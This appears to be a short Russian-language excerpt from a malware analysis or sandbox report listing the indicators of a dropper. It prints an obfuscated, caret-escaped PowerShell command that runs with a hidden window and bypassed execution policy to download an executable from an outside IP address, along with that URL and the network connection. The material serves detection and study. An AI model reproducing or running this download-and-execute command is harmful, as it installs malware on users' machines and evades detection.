Техническая информация
- http://86.106.131.141/file.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWeR^sHE^LL.exE^ ^-e^x^e^C^uTIO^nPOL^Ic^Y^ by^P^a^ss ^-Nop^rOf^i^le -W^IN^DOw^S^tyLE^ hI^Dde^N (Ne^W-ob^jEcT^ sy^S^T^Em^.nEt.WEbC^LIEnt).DoWNlOaD^f^IL^e^('http://86.106.131...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /C "P^oWeR^sHE^LL.exE^ ^-e^x^e^C^uTIO^nPOL^Ic^Y^ by^P^a^ss ^-Nop^rOf^i^le -W^IN^DOw^S^tyLE^ hI^Dde^N (Ne^W-ob^jEcT^ sy^S^T^Em^.nEt.WEbC^LIEnt).DoWNlOaD^f^IL^e^('http://86.106.131...' (со скрытым окном)